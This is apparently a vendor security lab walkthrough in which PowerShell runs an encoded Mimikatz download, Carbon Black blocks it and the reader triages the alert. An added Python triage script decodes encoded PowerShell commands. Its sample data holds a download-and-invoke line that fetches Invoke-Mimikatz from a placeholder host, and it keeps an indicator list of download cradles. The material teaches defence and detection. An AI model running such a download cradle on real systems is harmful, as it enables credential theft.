Maintain and Manipulate

After achieving initial access, attackers attempt to move forward with their goals. One of the most effective ways of doing that is scraping credentials or abusing binaries that already exist in the environment, like PowerShell. A trusted program like PowerShell is not blocked by traditional signature-based AV. It is commonly used across Windows environments for legitimate purposes, but attackers can leverage it for malicious intent as well. 

In this attack we will leverage PowerShell to attempt to perform malicious actions. Unlike the last alert we ran, PowerShell will not have a known malware reputation. Instead, Carbon Black applies prevention by looking at the behaviors that applications exhibit, and by recognizing that PowerShell is trying to execute content that contains malware (Mimikatz). Behavior-based rules can be specified to apply prevention even to trusted tools when they are being used maliciously.  

1. Run the Attack

We will use PowerShell to attempt to run an attack leveraging Mimikatz. The command has been encoded for further obfuscation. 

2. Run PowerShell commands

  1. Run PowerShell with administrative privileges
  2. Run command Set-ExecutionPolicy Unrestricted 
  3. Run command below

Carbon Black applies prevention, killing the malicious PowerShell instance. PowerShell attempts to leverage Mimikatz to scrape credentials; we can recognize this malicious behavior and kill the malicious instance, preventing the malicious actions. Note that PowerShell was allowed to run as expected until it began behaving maliciously. 

3. Investigate

We will now pivot to the Carbon Black Console to review information about the attack we just ran. If you are not currently on the Alerts page, navigate to Alerts using the left-hand menu. 

4. Review Information

  1. Navigate to the new alert (severity 8) and click the chevron to expand alert details 

5. Triage

The reputation for PowerShell is trusted whitelist, which is expected; in most cases we expect PowerShell to run normally without prevention, as it is used in many everyday IT activities. The power of Carbon Black is to define the behaviors that we want to prevent while allowing PowerShell to run when it should. 

6. Refresh Console for any issues

If you do not see your alert appearing, refresh the console page (the console URL, NOT the Horizon URL) and check again.

7. Alert Triage

  1. Click the tree icon to go to the alert triage 

8. PowerShell.exe node

  1. Click the first PowerShell.exe node 

In this attack PowerShell attempted to run encoded commands. Carbon Black automatically decodes encoded PowerShell scripts, reducing time to remediation and enhancing investigative ability. 
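The automatic decode is a console feature, but an analyst often needs to reproduce it on a command line captured elsewhere (an EDR export, a Sysmon event, a ticket). The Python script below is an added example, not code from Carbon Black or from this lab, that shows what that decode step does: powershell.exe accepts -EncodedCommand under any prefix of the parameter name (-e, -ec, -enc, ...) followed by Base64 over the UTF-16LE bytes of the script, so triage strips those two layers and then checks the plain-text script for a few indicator patterns. The command lines are constructed samples in the shape the console's CMD link shows; the host name in the first one is a placeholder that resolves nowhere, and the indicator list and function names are this example's own choices.

```python
from __future__ import annotations

import base64
import binascii
import re
from typing import Optional

# Patterns a triage rule would flag in a decoded script (case-insensitive). This list is
# chosen for the example; a production rule set would be broader and tuned per environment.
INDICATORS = {
    "mimikatz": r"mimikatz",
    "download-cradle": r"downloadstring|downloadfile",
    "invoke-expression": r"invoke-expression|\biex\b",
}


def encode_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then Base64.
    Used here only to build the constructed samples below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the Base64 argument of -EncodedCommand, or None if the command line has none.
    The parameter is matched by prefix ('e', 'ec', 'enc', ... up to 'encodedcommand') because
    powershell.exe accepts any of those spellings; -ExecutionPolicy ('ex...') does not match."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] in "-/" and len(tok) > 1:
            param = tok[1:].lower()
            if "encodedcommand".startswith(param):
                return tokens[i + 1]
    return None


def decode_encoded_command(b64: str) -> Optional[str]:
    """Reverse the Base64 and UTF-16LE layers; return None if the token is not a valid encoding."""
    try:
        raw = base64.b64decode(b64, validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def find_indicators(text: str) -> list[str]:
    """Return the names of the indicator patterns present in text, in INDICATORS order."""
    lowered = text.lower()
    return [name for name, pattern in INDICATORS.items() if re.search(pattern, lowered)]


def triage(cmdline: str) -> dict:
    """Decode the encoded command if there is one and list the indicators found.
    Indicators are matched against the decoded script when present, else the raw command line."""
    b64 = extract_encoded_command(cmdline)
    decoded = decode_encoded_command(b64) if b64 else None
    target = decoded if decoded is not None else cmdline
    return {"command_line": cmdline, "decoded": decoded, "indicators": find_indicators(target)}


def triage_all(cmdlines: list[str]) -> list[dict]:
    return [triage(c) for c in cmdlines]


# Constructed sample command lines. The first carries a stand-in for the lab's
# download-and-invoke script (placeholder host); the second is a benign encoded command;
# the third is not encoded at all; the fourth has a malformed Base64 token.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
    + encode_command("Invoke-Expression (New-Object Net.WebClient).DownloadString("
                     "'http://payload-host.invalid/Invoke-Mimikatz.ps1')"),
    "powershell.exe -enc " + encode_command("Get-Service | Where-Object Status -eq 'Running'"),
    "powershell.exe -ExecutionPolicy Unrestricted -File C:\\scripts\\inventory.ps1",
    "powershell.exe -ec not*valid*base64",
]


if __name__ == "__main__":
    for result in triage_all(SAMPLE_COMMAND_LINES):
        print(result["command_line"][:70])
        print("  decoded:   ", result["decoded"])
        print("  indicators:", result["indicators"])
```

Matching on the decoded text rather than the raw command line is the point: the Base64 token alone gives a signature nothing to hit, which is why the lab's encoded command slips past signature-based AV while a behavior rule, or this decode step, still sees "DownloadString" and "Invoke-Mimikatz" in the clear.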

9. Command Link

  1. Click the CMD link in the process details pane on the right-hand side of the screen 

10. Command Line

We can now see the formatted PowerShell script. In this case PowerShell downloads and attempts to invoke Mimikatz before being prevented by Carbon Black. The malicious actor would use Mimikatz to grab credentials for further attack actions.

11. Review Prevention

  1. Click the 'X' to close out of the CMD Line screen
  2. Click the second PowerShell.exe node

Note the red shield icon indicating that Carbon Black applied prevention. Additional process details including behaviors exhibited by the specific instance of PowerShell can be viewed on the right.